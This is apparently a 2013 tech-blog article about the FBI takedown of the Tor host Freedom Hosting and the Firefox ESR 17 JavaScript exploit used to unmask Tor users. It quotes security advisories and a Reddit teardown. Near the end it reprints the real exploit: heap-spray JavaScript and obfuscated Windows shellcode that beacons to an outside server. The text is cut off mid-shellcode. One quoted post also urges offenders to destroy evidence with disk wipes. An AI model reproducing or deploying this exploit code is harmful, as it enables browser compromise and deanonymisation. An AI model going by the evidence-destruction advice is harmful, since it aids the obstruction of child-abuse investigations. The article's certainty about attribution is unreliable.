Freedom Hosting – Tor onion site takedown
U.S. authorities have arrested 28-year-old Eric Eoin Marquesm the alleged owner of Freedom Hosting, the largest Deep Web hosting platform on the planet. The arrest was made in Dublin, Ireland (Marquesm was born in the United States but moved to Ireland when he was five years old) with the takedown reportedly disrupting a large part of the Tor network which is, sadly, the secretive web underworld home of the majority of all illegal online activity. It is also believed that in the process, the United States (or someone) secretly planted a malicious JavaScript-based “virus” (“malware” would be a more accurate definition) on many Onion websites. The purpose of the malicious script is believed to be of course, to uncloak and reveal the identities of those using the anonymous Tor network. On the plus side, it is believed that by removing this single host from the Tor network, they have effectively removed “the majority of all online child pornography”.
Anonymous Onion sites, which are accessed through the onion protocol, are hosted the same as regular World Wide Web sites but are addressed through an .onion-address in order to direct requests to a server that remains “hidden” and route back the data to the anonymous users. The design of the Tor network ensures that the user can not know where the server is located and the server cannot find out the IP address of the user (except by intentional malicious means like hidden tracking code embedded in web pages delivered by the server – but we’ll get to that later). Although anonymously addressed, onion site owners must run their sites with a hosting provider that accepts payments in anonymous currency and will willingly turn a blind eye to the contents of the server they are hosting. The largest such service, as of this week, was Freedom Hosting.
As justification for the raid, in a related extradition hearing last week, the FBI described Marquesm as the “largest facilitator of child porn on the planet”, with “facilitator” being the key word here. Marquesm will most certainly argue that he was simply providing an anonymous service with no knowledge of what was being hosted on his company’s servers. Regardless, history has taught us that Marquesm is likely to be prosecuted and jailed for a long, long time (hey, Anonymous warned him to clean up his act way back in 2011). The arrest warrant for Marques was issued July 29 by the U.S. attorney general in Maryland with the takedown of Freedom Hosting occurring just a few days later.
Malicious Tor takedown JavaScript injection related to takedown
In what is most certainly related to the takedown, Tor users noted an odd occurrence shortly before the raid on Freedom Hosting took place. It was reported that Tor users, specifically users of the Windows version of the Tor browser bundle, began to notice odd JavaScript code running on certain onion websites, specifically those hosted by Freedom Hosting. Thus far, nobody is sure how the malware managed to infect Freedom Hosting servers but it is believed that the purpose of the malicious code was to identify users of its systems.
Extreme Tech noted that the script “seemed to exploit a loophole in JavaScript” that is present on unpatched versions of the Firefox browser (Tor Browser Bundle TBB Firefox 17 – which is a popular bundle for Tor users). It was noted that the JavaScript reported back to a server hosted on a open web server (i.e. not a hidden Tor service) located in the Washington, DC area (65.222.202.51, 65.222.202.53 or 65.222.202.54, port 80).
Tor’s Hidden Wiki website quickly posted a warning:
A recent security threat has been noted on Hidden Services hosted by Freedom Hosting. Please be sure to update your Tor Browser Bundle and disable JavaScript. Further information can be found on OnionNews or the Independent.ie. More info on the Onion subreddit. Ranger Feina (talk) 14:40, 5 August 2013 (UTC)
Israeli-based Cyberhat Security reported that the script, which is injected through an iFrame-based browser attack, does a simple GET to a server hosting off of the anonymous Tor network. In the process, a unique identifying tag is passed to the server. Information Week explained how the exploit worked:
“Based on a teardown of the malware, it was an iFrame injection script designed only to plant a universally unique identifier (UUID) on a target’s computer. ‘Ironically, all the malicious script does is perform a GET request to a new domain, which is hosted outside of the Tor network, while transferring the same UUID to the server. That way, whoever is running this exploit can match any Tor user to his true Internet address, and therefore track down the Tor user.’
Multiple security researchers have said the relative non-maliciousness of the attack suggests that it may have been the work of a law enforcement agency (LEA) such as the FBI. ‘Because this payload does not download or execute any secondary backdoor or commands it’s very likely that this is being operated by an LEA and not by blackhats.'”
Some Tor users suspect that the malicious script crept inside the Tor network from OnionBank, which was allowed to link “donation” graphics on several prominent onion web sites. This had been a hot topic on Tor for some time with many pointing out the potential security vulnerability the link would introduce.
That the U.S. is behind the attack is a certainty. It is known that the United States has used viruses and malware in the past to penetrate the defenses of illegal servers (or countries that they differ with). As of the time of this writing, the malware is believed to still be present on the Tor network. One panicked onion site owner posted the following warning on his chat boards:
UNKNOWN JAVASCRIPT IN THE BOARD PAGES POINTING TO IFRAME TO A VERIZON SERVER ON THE OPEN WEB!!!!!!! THEY ARE INSERTED BY FH [Freedom Hosting]! I WOULD CONSIDER FH COMPROMISED!!!! THEY ARE ALSO IN TLZ AND OTHER SITES PAGES!! STAY AWAY FROM ALL FH HOSTED SITES, including TLZ [The Love Zone], LC [Lolita City], TORMAIL, ALL OF THESE ARE HOSTED ON FH!!!!!!!!!!!!!! ALL BOARDS HAVE BEEN DELETED TO PROTECT YOU!! IF THE BOARDS COME BACK UP, IT IS NOT ME RUNNING THE SITE ANYMORE, ALL ADMIN/MOD ACCOUNTS HAVE BEEN DELETED!!
The attack should not have been totally unexpected. Tor troubles have been brewing as of late including arrests of prominent Tor users and attacks against major sites. According to Naked Security:
“The ‘deep web’ operating inside the Tor cloud has been hit by internal issues of late, with a major criminal message board being hijacked and defrauded by one of its own trusted admins.”
Who the Tor takedown script targets and how to disable it
The unexpected (do we dare call it “ingenious”?) takeover has caused concern for legitimate Tor users, who rely on the service to protect them from government snooping and/or to provide freedom of speech to areas where it might otherwise be denied. Notwithstanding the “pedos” (aka Chester the Molester) that are now frantically wiping their harddrives and planning overseas trips, some users may now literally fear for their lives.
Why now and Whodunnit?
Before we understand the how, it helps to understand the why.
That the intent of the takedown was to shut down prominent child pornography websites can’t be argued. By why now after these sites have run unhindered for many years? When news first broke and the arrest was accredited to the FBI, reporters assumed that meant the FBI was solely behind the investigation. Not likely. The IP address (reported variously as 65.222.202.51, 65.222.202.53 or most likely, 65.222.202.54) has been traced back to SAIC, a NSA (and FBI, DARPA, and CIA) contractor with oddly enough, plenty of ties to Verizon Wireless (why does Verizon’s name keep popping up in these instances?). Although the NSA is not known for child pornography investigations, the takedown could be related to increasingly harsh public criticism of NSA policies that allow unfettered surveillance of all United States citizens. As the public’s complaint of privacy rights violations grows louder, the United States government’s era of “unrestricted spying” may be coming to an end.
Regardless, in all likelihood, the NSA did the grunt work and the FBI cleaned up after the fact. Not hiding their true IP address (the source’s IP was easily traced to Washington, DC) is a bold move – or a calling card purposely left behind. Hey, we have China conducting foreign attacks from their national headquarters. Maybe this is the new norm…
Or the takedown could be related to the fact that the Firefox flaw which allowed the JavaScript injection was encountered and publicly disclosed in a security advisory about six weeks ago. Possibly the feds heard about the flaw, recognized the opportunity, and moved quickly before the patch was widely available (as we’ll discuss more below, the attack was directed at Windows users – not the most wily users when it comes to proper, and safe, Tor usage).
Or possibly the timing of the arrest and Freedom Hosting shutdown is related to the fact that most blackhat hackers are at the DEF CON conference in Las Vegas this week. One hacker quipped:
“FBI uploads malicious code on the deep websites while everyone is off at DEF CON. Talk about playing dirty.”
The flaw and patch
The Windows-specific Firefox flaw exploited by the injection script was patched on June 25, 2013, with the release of Firefox 22 and Firefox Extended Service Release (ESR) version 17.0.7. According to Information Week:
“People who are on the latest supported versions of Firefox are not at risk. Although the vulnerability affects users of Firefox 21 and below, the exploit targets only ESR-17 users. Since this attack was found on Tor hidden services, presumably that is because the Tor Browser Bundle (TBB) is based on Firefox ESR-17. Users running the most recent TBB have all the fixes that were applied to Firefox ESR 17.0.7 and were also not at risk from this attack.”
A simple solution to the problem is of course, to disable JavaScript in the web browser entirely (something Tor has always recommended and intelligent smart Tor users already do).
Here’s the original Firefox security advisory:
Advisory 2013-53
Execution of unmapped memory through onreadystatechange event
Impact: Critical
Announced: June 25, 2013
Reporter: Nils
Products: Firefox, Thunderbird, Seamonkey
Fixed in: Firefox 22.0
Firefox ESR 17.0.7
Thunderbird 17.0.7
Thunderbird ESR 17.0.7
SeaMonkey 2.19
DescriptionSecurity researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.
Tor Announce issued this advisory shortly after the attack.
[tor-announce] Tor security advisory: Old Tor Browser Bundles vulnerable
Roger Dingledine arma at mit.edu
Mon Aug 5 15:13:12 UTC 2013
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
SUMMARY: This is a critical security announcement. An attack that exploits a Firefox vulnerability in JavaScript [1] has been observed in the wild. Specifically, Windows users using the Tor Browser Bundle (which includes Firefox plus privacy patches [2]) appear to have been targeted. This vulnerability was fixed in Firefox 17.0.7 ESR [3]. The following versions of the Tor Browser Bundle include this fixed version: 2.3.25-10 (released June 26 2013) [4] 2.4.15-alpha-1 (released June 26 2013) [4] 2.4.15-beta-1 (released July 8 2013) [5] 3.0alpha2 (released June 30 2013) [6] Tor Browser Bundle users should ensure they're running a recent enough bundle version, and consider taking further security precautions as described below. WHO IS AFFECTED: In principle, all users of all Tor Browser Bundles earlier than the above versions are vulnerable. But in practice, it appears that only Windows users with vulnerable Firefox versions were actually exploitable by this attack. (If you're not sure what version you have, click on "Help -> About Torbrowser" and make sure it says Firefox 17.0.7. Here's a video: [7]) To be clear, while the Firefox vulnerability is cross-platform, the attack code is Windows-specific. It appears that TBB users on Linux and OS X, as well as users of LiveCD systems like Tails, were not exploited by this attack. IMPACT: The vulnerability allows arbitrary code execution, so an attacker could in principle take over the victim's computer. However, the observed version of the attack appears to collect the hostname and MAC address of the victim computer, send that to a remote webserver over a non-Tor connection, and then crash or exit [8]. The attack appears to have been injected into (or by) various Tor hidden services [9], and it's reasonable to conclude that the attacker now has a list of vulnerable Tor users who visited those hidden services. We don't currently believe that the attack modifies anything on the victim computer. WHAT TO DO: First, be sure you're running a recent enough Tor Browser Bundle. That should keep you safe from this attack. Second, be sure to keep up-to-date in the future. Tor Browser Bundle automatically checks whether it's out of date, and notifies you on its homepage when you need to upgrade. Recent versions also add a flashing exclamation point over the Tor onion icon. We also post about new versions on the Tor blog: https://blog.torproject.org/ Third, realize that this wasn't the first Firefox vulnerability, nor will it be the last [10]. Consider disabling JavaScript (click the blue "S" beside the green onion, and select "Forbid Scripts Globally"). Disabling JavaScript will reduce your vulnerability to other attacks like this one, but disabling JavaScript will make some websites not work like you expect. A future version of Tor Browser Bundle will have an easier interface for letting you configure your JavaScript settings [11]. You might also like Request Policy [12]. And you might want to randomize your MAC address, install various firewalls, etc. Fourth, consider switching to a "live system" approach like Tails [13]. Really, switching away from Windows is probably a good security move for many reasons. And finally, be aware that many other vectors remain for vulnerabilities in Firefox. JavaScript is one big vector for attack, but many other big vectors exist, like css, svg, xml, the renderer, etc. We need help improving usability of (and doing more security analysis of) better sandboxing approaches [14] as well as VM-based approaches like Whonix [15] and WiNoN [16]. Please help! [1] https://www.mozilla.org/security/announce/2013/mfsa2013-53.html [2] https://www.torproject.org/projects/torbrowser/design/ [3] https://blog.mozilla.org/security/2013/08/04/investigating-security-vulnerability-report/ [4] https://blog.torproject.org/blog/new-tor-browser-bundles-and-tor-02414-alpha-packages [5] https://blog.torproject.org/blog/tor-02415-rc-packages-available [6] https://blog.torproject.org/blog/tor-browser-bundle-30alpha2-released [7] https://media.torproject.org/video/2013-08-05-TBBversion.mp4 [8] http://tsyrklevich.net/tbb_payload.txt [9] https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting [10] https://www.mozilla.org/security/known-vulnerabilities/firefoxESR.html [11] https://trac.torproject.org/projects/tor/ticket/9387 [12] https://www.requestpolicy.com/ [13] https://tails.boum.org/ [14] https://trac.torproject.org/projects/tor/ticket/7680 [15] http://sourceforge.net/projects/whonix/ [16] http://dedis.cs.yale.edu/2010/anon/papers/osdi12.pdf https://trac.torproject.org/projects/tor/ticket/7681 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 190 bytes Desc: Digital signature URL: <http://lists.torproject.org/pipermail/tor-announce/attachments/20130805/eb50a280/attachment.sig>
Sites known to be impacted by the takedown
Here’s a partial list of sites that are now down. Yes, some sites on the list will make you not feel so sorry for Eric Marquesm but remember, the intent of Tor is to provide anonymity, not to distribute porn, bestiality, or snuff pics. Note that Tormail, by far the most popular Tor-based anonymous email service, was hosted by Freedom Hosting and is now effectively in the hands of the feds.
Tormail (Wow!), Onion Bank, PedoEmpire, Lolita City, HackBB, TCF, LR, FH, Torimages, The Laboratory, Bitcoin Fog (this one’s a bit sketchy right now)
Life goes on
Yikes – what about The Silk Road?
And for those that are wondering, The Hidden Wiki and Silk Road (prominent and popular Tor websites) seem to have been unaffected by the outage. That being said, you’re a fool if you think they’re not next in line. You’ve been warned.
Tor-pedo chatter
Chatter on Tor is that angry pedo (Chester the Molester) users are planning some pretty serious retribution – or so they say. The pedos have never been considered the sharpest tack in the box so I’m not so sure I’d worry too much (I think they’re the reason JavaScript is turned on by default in the TBB bundle). Here’s what one pedo goof posted shortly after the takedown:
“What this is about is the USA Empire opposing the idea of men having little girl wives. Of the man being the master (ba’al) as written in Deuteronomy. It enforces it’s will world wide, making a world fit for women but not for men. The only solution will probably be a world war. The USA belief system, since it has taken over the whole world and will not stop, needs to be supplanted, no matter what.”
Marguesm status and Tor reaction
Eric Marquesm, who also owns Host Ultra Unlimited, is being held without bail in Ireland (he was classified as a flight risk and his bail request was denied) and is awaiting extradition to the United States. Tor itself has already released a statement clarifying the nature of its service and disavowing any relationship with Marquesm or Freedom Hosting. Here’s their full statement:
Hidden Services, Current Events, and Freedom HostingPosted August 4th, 2013 by phobos
Around midnight on August 4th we were notified by a few people that a large number of hidden service addresses have disappeared from the Tor Network. There are a variety of rumors about a hosting company for hidden services: that it is suddenly offline, has been breached, or attackers have placed a javascript exploit on their web site.
A Hidden service is a server – often delivering web pages – that is reachable only through the Tor network. While most people know that the Tor network with its thousands of volunteer-run nodes provides anonymity for users who don´t want to be tracked and identified on the internet, the lesser-known hidden service feature of Tor provides anonymity also for the server operator.
Anyone can run hidden services, and many do. We use them internally at The Tor Project to offer our developers anonymous access to services such as SSH, IRC, HTTP, and our bug tracker. Other organizations run hidden services to protect dissidents, activists, and protect the anonymity of users trying to find help for suicide prevention, domestic violence, and abuse-recovery. Whistleblowers and journalists use hidden services to exchange information in a secure and anonymous way and publish critical information in a way that is not easily traced back to them. The New Yorker’s Strongbox is one public example.
Hidden service addresses, aka the dot onion domain, are cryptographically and automatically generated by the tor software. They look like this http://idnxcnkne4qt76tg.onion/, which is our torproject.org website as a hidden service.
There is no central repository nor registry of addresses. The dot onion address is both the name and routing address for the services hosted at the dot onion. The Tor network uses the .onion-address to direct requests to the hidden server and route back the data from the hidden server to the anonymous user. The design of the Tor network ensures that the user can not know where the server is located and the server can not find out the IP-address of the user, except by intentional malicious means like hidden tracking code embedded in the web pages delivered by the server. Additionally, the design of the Tor network, which is run by thousands of volunteers, ensures that it is impossible to censor or block certain .onion-addresses.
The person, or persons, who run Freedom Hosting are in no way affiliated or connected to The Tor Project, Inc., the organization coordinating the development of the Tor software and research. In the past, adversarial organizations have skipped trying to break Tor hidden services and instead attacked the software running at the server behind the dot onion address. Exploits for PHP, Apache, MySQL, and other software are far more common than exploits for Tor. The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of javascript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect user’s computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based. We’re investigating these bugs and will fix them if we can.
As for now, one of multiple hidden service hosting companies appears to be down. There are lots of rumors and speculation as to what’s happened. We’re reading the same news and threads you are and don’t have any insider information. We’ll keep you updated as details become available.
[sarcasm] The feds officially refused to comment for this article but one fed told Geek Slop, off the record:
Hey, we paid for the thing in the first place!
Technical stuff for the nerds:
Reddit analysis of the JavaScript code
Below is the Reddit analysis of the malicious code which points out the version of Firefox that was vulnerable and notes that only Windows users with JavaScript enabled were impacted (the full exploit code is included below). They also note that in order to avoid attention to extraneous <script> tags, the code was cleverly launched from an error trap on a non-existent image file. The complete code from the exploit is located below.
1. It runs only if Javascript was enabled and affects Firefox 17 on Windows. The exploit used (MFSA 2013-53) and was fixed in Firefox 17.0.7 which is the one used in the latest Tor Browser Bundle, and relies on Windows libraries to execute its payload. If you were using an outdated Tor Browser on Windows and you had Javascript enabled (it is by default) then you have definitely been compromised. If you were using Tor on any other OS, had disabled Javascript, or had the latest version of the Tor Browser Bundle (Torbrowser – Help – About shows the version, which must be 17.0.7 or higher) then you are safe and your public IP has not been transmitted anywhere.
2. The exploit has only been online since after the servers came back on August 3rd, 2013. Now read on for the details…
3. By default, the Tor Browser comes with NoScript set to “Allow All Javascript Globally”, meaning that Javascript is enabled by default. They do this to make it convenient for users which is why it’s the default setting even though it’s not safe.
4. If you were running an exploitable version of the Tor Browser on Windows and didn’t either manually set NoScript to “Forbid Javascript Globally” or disabled Javascript entirely via the Firefox settings, then you are absolutely 100% busted. But if you had disabled Javascript like smart people kept telling you, using either of the two methods mentioned, then the code never executed and you are safe.
5. The FreedomHosting compromise consisted of a small, non-existent image <img> tag injected into all Freedom Hosting sites, and this <img> tag contained an <img onerror=””> event attribute. The fact that the image was missing meant that the “onerror” code ran and retrieved the rest of the code from another Onion site. They did it this way via a small, hidden image to avoid drawing attention to any obvious <script> tags.
6. The main payload (main exploit code) from that onion site then created an iframe and set a cookie in it (the sole purpose of which was to reliably identify your unique browser as you traveled between different compromised FH sites, to build a list of which FH sites you’ve been visiting) and more importantly ran some 0-day exploits using heap overflows to run any code they desired and escape the Tor sandbox.
7. The 0day exploit code executed some functions that revealed your public internet IP address, MAC address, local hostname (such as “LarrysPC”) and what Freedom Hosting site you were browsing (they used a unique UDID for each compromised website) and sent it all to a clear-net IP in Washington. This is no joke. I wish I was kidding. It really did this! They transmit your unique browser ID (cookie value) over the clear internet to their public-internet server, thus giving them a physical person tied to the “random person” they’ve been observing browsing the different FH sites. With this connection performed, they know your public IP, they have the computer’s hostname & MAC address to conclusively identify your computer, they have your unique browser ID cookie, and they have a full list of Freedom Hosting sites that have been viewed by that unique browser. They know exactly how deeply you are involved and their lists allow them to target the people that are clearly intentionally seeking out illegal content.
8. The use of zero-day exploits means that the attacker had the huge resources required to find such completely new exploits, and is therefore most likely the government. [Geek Slop note: this statement is incorrect. The vulnerability has been known for several weeks]
9. The fact that FreedomHosting was compromised means that the attacker either physically seized the servers and installed the code (government), or managed to exploit the webserver software (other malicious attacker). Considering recent news reports, it is clear that it was the government.
10. The fact that the clear-net IP collecting all the data is in Washington and that FreedomHosting is now down without a word suggests that the attacker was in fact the FBI.
11. The attacker now has the public IP addresses + what FreedomHosting site you were viewing of everybody that had Javascript enabled on Windows with an outdated Tor Browser Bundle. You better prepare to be raided. Destroy all the evidence now, if your freedom depends on it.
12. The cookie is called “n_serv” and can be viewed under Tor Button – Cookie Protections. By default, Tor is set to erase all non-protected cookies on browser restarts (and to make all cookies non-protected unless explicitly told by the user to protect certain cookies). This means that the “n_serv” cookie will not persist between browser restarts, unless the FBI has made part of their exploit code tell Tor Button to protect the cookie. That is very unlikely, though, as it would be difficult to do so and wouldn’t do them much good, since the cookie changing its value doesn’t actually harm their operation. They will still get your public IP for every unique browser ID that’s being transmitted to them, so it doesn’t matter to them if the cookie gets cleared and the browser ID changes. Therefore, due to the fact that the cookie clears itself on restart, the only way to know if you’ve been affected if you’re running a vulnerable browser bundle is if your browser has been running non-stop since before FreedomHosting went down. Meaning that your browser has been running for at least 1 week, preferably 2 or more. If you’ve got no “n_serv” cookie in a session that has lasted that long then you conclusively know that the exploits have never successfully executed on your machine. The cookie only clears on browser restart. I’ve always been using NoScript in “Forbid Javascript Globally” mode, my last browser restart was over 2 weeks ago and I am 100% sure I have browsed some FH sites before they went offline and without restarting this browser and I don’t have the cookie. People that have either set NoScript to globally forbid, or disabled Javascript entirely in the Firefox settings, are therefore conclusively safe. Everyone else will have been infected and can check for the existence of that cookie to verify that fact (will only be there if their browser hasn’t restarted in the past few weeks). Note that the cookie will be created if Javascript is enabled, but the exploit that transmits your public IP to tie that cookie to your identity is a separate action and will only run on exploitable (outdated) Tor Browser Bundles on Windows. Therefore, the existence of the cookie is not enough reason to panic yet. If you’re using Windows and you’ve got a Javascript-enabled Tor Browser that’s older than 17.0.7 then your identity has absolutely been compromised.
13. Previous news reports from July 29th, 2013 shows that the FBI performed a nationwide “child sex trafficking” bust, freeing 105 children and arresting 150 pimps/ring leaders (www.fbi.gov/news/stories/2013/july/operation-cross-country-recovering-victims-of-child-sex-trafficking/operation-cross-country-recovering-victims-of-child-sex-trafficking).
14. Other news from July 29th, 2013 shows that the FBI is trying to extradite “the biggest child-porn facilitator on the planet” from Ireland (www.independent.ie/irish-news/courts/fbi-bids-to-extradite-largest-childporn-dealer-on-planet-29469402.html). Seems that the FH admin was a 28 year old that was arrested in Ireland and that the javascript exploits were set up in a joint-operation between the FBI and the Irish law enforcement since all collected IPs were sent to the FBI. If this is the guy, then Freedom Hosting is never coming back, and he’s looking at a lot of jailtime.
15. Also consider the fact that the attackers installed code that uniquely identifies each FreedomHosting site you were visiting, since FH served much more than just child porn. The FBI wouldn’t want to bust down the doors of people that were looking at relatively harmless stuff from FreedomHosting. They really cared about knowing which specific sites you were viewing and took many steps to ensure that they accurately tracked which sites you visited, through the use of per-site UDIDs and a tracking cookie.
16. Timeline of events: FreedomHosting admin starts accepting BitCoins a few months ago. The FBI traces his BitCoin transactions to withdrawals into a real-world bank account via currency exchange services, thus revealing the identity of the FH admin, and an arrest is made on July 29th, 2013 in Ireland. The servers were then shut down. On August 3rd, 2013 the sites came back online with the exploit code installed.
17. It is pretty conclusive: Get a fucking move on if you were too stupid to disable Javascript, keep Tor Browser Bundle updated, were running Windows, and visited any of the FH sites after they came back online. You do not have much time. Someone in Washington, otherwise known as the FBI, now has your public IP and a list of which FH sites you were browsing. GET A FUCKING MOVE ON! NOW! Destroy everything before you end up behind bars! Remember to run multiple secure wipe-passes of your entire hard drives so that NOTHING can be recovered, and remember that encryption alone is not safe enough, data leaks out of your encrypted containers into the operating system’s thumbnail caches. They might not be able to view your actual encrypted TrueCrypt images, but they sure as hell can see what kind of images you had been looking at in the past (Windows has a global thumbnail database containing smaller versions of all Thumbs.db contents from every drive on the system, Mac OS has a QuickLook cache of everything you have ever viewed, and Linux has similar leaks depending on what image viewers you were using). Also remember that they can force you to give up encryption keys (and even sentence you harshly based on suspicion if you refuse to give it out), so it’s definitely not safe to keep encrypted TrueCrypt containers. Your freedom should be worth more than that. Take no chances. Perform a full 3-pass random DBAN (http://www.dban.org/) format of ALL hard disks that were used for child porn AND ALL operating system disks related to that! We are on the verge of a global law-enforcement crackdown unlike anything else ever before once the FBI uses the data they have collected, and you may only have a few days until the knock comes. Don’t waste time with 35-pass erases, it takes days and they may knock on the door sooner than it can finish and research shows that even a single-pass erase is safe enough, but I would do 3 random passes just to be extra safe. Good luck everyone and may God be with you. Time to brace for impact. And remember that silence does not mean that nothing is going on. People that are getting busted won’t have any time to connect to Tor and let others know they’ve been busted. Silence does not mean that busts are not taking place. The FBI is taking this FreedomHosting compromise as the biggest victory in human history. You should treat it with equal respect and do everything in your power to stay safe. This is the calm before the storm. You will see the victims being paraded around in a giant FBI press release within a month or two.
18. For those that had blocked Javascript and are safe: It’s now a good idea to remember that Tor should never be trusted, and that any content from Tor sites can be compromised at any time. Always be sure to update your media players such as VLC to the latest versions to protect against exploits in media files. There are no signs that such tampering has taken place, but this is a good time to remind people to be smart. How to be as safe as you can be: 1: Keep Tor Browser Bundle up to date every time you get an update notification. 2: Always disable Javascript. 3: Always keep all your software fully updated. 4: Run everything in a Virtual machine (VirtualBox is free) to avoid data leaking out into your main OS. 5. Use Linux in that VM even if you are primarily a Windows user, because Linux is a fuckton more resilient against attacks. 6: Use encrypted containers inside the VM if your freedom depends on your data being safe from prying eyes. 7: Trust noone. Never reveal personal info on Tormail (now compromised) or even Torchat. You never want to leak anything that leads back to you. Always assume that everyone is out to get you and you will never have the issue of trusting the wrong person.
19. More warnings (TORMAIL): The hidden service for Tormail has been compromised since it ran on FreedomHosting. It’s therefore very likely that all the contents of your Tormail inboxes are in their hands. Do not log into your accounts. Depending on how Tormail works, your emails might possibly have been stored in encrypted form in the database and will only be decrypted whenever you log in. In that case, they can only read them by installing a backdoor that makes unencrypted copies as soon as someone logs into their account. Logging in would thereby give them the unencrypted versions. Alternatively, if Tormail already stored everything unencrypted then they already have a complete copy of it and no logging-in-and-deleting will do any good whatsoever. Unfortunately everything points towards Tormail just using a regular IMAP mail server hosted on Freedom Hosting (because of how they allowed regular Roundcube / SquirrelMail access to your mailbox, both of which are just regular unencrypted IMAP web clients), and that would mean that all plaintext emails are already in the FBI’s hands and there’s nothing you can do about it. Do not log in. Logging in can only make things worse! Tormail is guaranteed to be a major part of this sting because it (along with certain private messaging systems on boards) is the most likely place where people will reveal their true identities to people they’ve trusted. Tormail has been compromised and all you can do now is NOT log in, and pray that everything was stored as decrypt-on-demand via custom IMAP server software (unfortunately extremely unlikely because no off-the-shelf IMAP servers offer encrypted email storage). That, and destroy all the evidence so that anyone knocking down your door will find nothing on your computers.
Original code
Below is the original JavaScript code from the Tor attack that was likely related to the Freedom Hosting takedown. The payload for the malware, a Windows .exe executable, is obfuscated and hidden in the magneto variable. A disassembly of the executable is located below.
Note: If you find the code hard to follow, don’t worry – it was coded that way on purpose. Comments in the code were added by me.
nl7qbezu7pqsuone.onion/?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 iframe:
<html>
<body>
<iframeframeborder=”0″border=”0″height=”1″width=”1″id=”iframe”></iframe>
</body>
</html>
<script>
var var1 = 0xB0;
var var2 = new Array(var1);
var var3 = new Array(var1);
var var4 = new Array(var1);
var var5 = 0xFF004;
var var6 = 0x3FC01;
var var7 = 0x60000000;
var var8 = 0x18000000;
var var9 = 1;
var var10 = 0x12000000;
var var11 = 0;
var var12 = 0;
var var13 = 0;
function df() {
if (var12 == 0) {
return 0x00000000;
}
var var14 = var10 + 0x00010000 * var11 + 0x0000002B;
if (var9 == 1 || var9 == 2)
return (var14 – var12);
else
return 0x00000000;
}
function b() {
var version = al();
if (version < 17) {
window.location.href = “content_1.html”;
}
if (version >= 17 && version < 18)
var12 = 0xE8;
return;
}
function c() {
var iframe = document.getElementById(“iframe”);
// The code for content_1.html is located below. It basically builds the
// iframe to house content_2.html
iframe.src = “content_2.html”;
}
function d() {
for (var j = 0; j < var1; j++) {
if (j < var1 / 8 || j == var1 – 1) {
var tabb = new Array(0x1ED00);
var4[j] = tabb;
for (i = 0; i < 0x1ED00; i++) {
var4[j][i] = 0x11559944;
}
}
var2[j] = new ArrayBuffer(var5);
}
for (var j = 0; j < var1; j++) {
var3[j] = new Int32Array(var2[j], 0, var6);
var3[j][0] = 0x11336688;
for (var i = 1; i < 16; i++) {
var3[j][0x4000 * i] = 0x11446688;
}
}
for (var j = 0; j < var1; j++) {
if (typeof var4[j] != “undefined”) {
var4[j][0] = 0x22556611;
}
}
}
function e(view) {
var i = 0;
for (i = 0; i < 0x400; i++) {
view[i] = var13 + 0x1010;
}
view[0x0] = var13 + 0x1010;
view[0x44] = 0x0;
view[0x45] = 0x0;
view[0x400 – 4] = var13 + 0x1010;
view[0x400] = 0x00004004;
view[0x401] = 0x7FFE0300;
}
// The magneto variable contains the payload – a Windows .exe designed to capture
// the user’s MAC address and machine hostname. It has been disassembled below.
function f(var15, view, var16) {
var magneto = “”;
var magneto = (“\ufc60\u8ae8” + “\u0000\u6000” + “\ue589\ud231” + “\u8b64\u3052” + “\u528b\u8b0c” + “\u1452\u728b” + “\u0f28\u4ab7” + “\u3126\u31ff” + “\uacc0\u613c” + “\u027c\u202c” + “\ucfc1\u010d” + “\ue2c7\u52f0” + “\u8b57\u1052” + “\u428b\u013c” + “\u8bd0\u7840” + “\uc085\u4a74” + “\ud001\u8b50” + “\u1848\u588b” + “\u0120\ue3d3” + “\u493c\u348b” + “\u018b\u31d6” + “\u31ff\uacc0” + “\ucfc1\u010d” + “\u38c7\u75e0” + “\u03f4\uf87d” + “\u7d3b\u7524” + “\u58e2\u588b” + “\u0124\u66d3” + “\u0c8b\u8b4b” + “\u1c58\ud301” + “\u048b\u018b” + “\u89d0\u2444” + “\u5b24\u615b” + “\u5a59\uff51” + “\u58e0\u5a5f” + “\u128b\u86eb” + “\u5d05\ubd81” + “\u02e9\u0000” + “\u4547\u2054” + “\u7075\u858d” + “\u02d1\u0000” + “\u6850\u774c” + “\u0726\ud5ff” + “\uc085\u5e74” + “\u858d\u02d8” + “\u0000\u6850” + “\u774c\u0726” + “\ud5ff\uc085” + “\u4c74\u90bb” + “\u0001\u2900” + “\u54dc\u6853” + “\u8029\u006b” + “\ud5ff\udc01” + “\uc085\u3675” + “\u5050\u5050” + “\u5040\u5040” + “\uea68\udf0f” + “\uffe0\u31d5” + “\uf7db\u39d3” + “\u74c3\u891f” + “\u6ac3\u8d10” + “\ue1b5\u0002” + “\u5600\u6853” + “\ua599\u6174” + “\ud5ff\uc085” + “\u1f74\u8dfe” + “\u0089\u0000” + “\ue375\ubd80” + “\u024f\u0000” + “\u7401\ue807” + “\u013b\u0000” + “\u05eb\u4de8” + “\u0001\uff00” + “\ub8e7\u0100” + “\u0000\uc429” + “\ue289\u5052” + “\u6852\u49b6” + “\u01de\ud5ff” + “\u815f\u00c4” + “\u0001\u8500” + “\u0fc0\uf285” + “\u0000\u5700” + “\uf9e8\u0000” + “\u5e00\uca89” + “\ubd8d\u02e9” + “\u0000\uebe8” + “\u0000\u4f00” + “\ufa83\u7c20” + “\uba05\u0020” + “\u0000\ud189” + “\uf356\ub9a4” + “\u000d\u0000” + “\ub58d\u02c4” + “\u0000\ua4f3” + “\ubd89\u024b” + “\u0000\u565e” + “\ua968\u3428” + “\uff80\u85d5” + “\u0fc0\uaa84” + “\u0000\u6600” + “\u488b\u660a” + “\uf983\u0f04” + “\u9c82\u0000” + “\u8d00\u0c40” + “\u008b\u088b” + “\u098b\u00b8” + “\u0001\u5000” + “\ue789\uc429” + “\ue689\u5657” + “\u5151\u4868” + “\ud272\uffb8” + “\u85d5\u81c0” + “\u04c4\u0001” + “\u0f00\u0fb7” + “\uf983\u7206” + “\ub96c\u0006” + “\u0000\u10b8” + “\u0000\u2900” + “\u89c4\u89e7” + “\ud1ca\u50e2” + 